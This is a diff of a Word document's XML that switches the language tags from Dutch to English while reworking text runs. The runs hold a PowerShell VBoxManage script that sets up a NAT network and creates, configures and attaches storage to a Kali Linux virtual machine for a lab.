-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> start --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>netname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Start-Sleep 10</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># 2. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Create</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Kali VM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attack | +- 2min</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t># Register VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>createvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --name $KALI_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ostype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'Debian_64' --register</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Set VM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>settings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>modifyvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
       </w:r>
@@ -7581,511 +6176,61 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>cpus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>graphicscontroller</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vmsvga</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --nat-network1 $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --drag-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-drop </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>SATA storage</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'.\VDI\Kali</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>sata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --controller </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>IntelAHCI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>bootable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>existing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> VDI </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>SATA controller</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storageattach</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>hdd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium '.\VDI\Kali Linux 2023.4 (64bit).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Linux 2023.4 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>vdi</w:t>
       </w:r>
@@ -8094,7 +6239,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -8104,50 +6249,32 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxGuestAdditions</w:t>
       </w:r>
@@ -8156,43 +6283,25 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
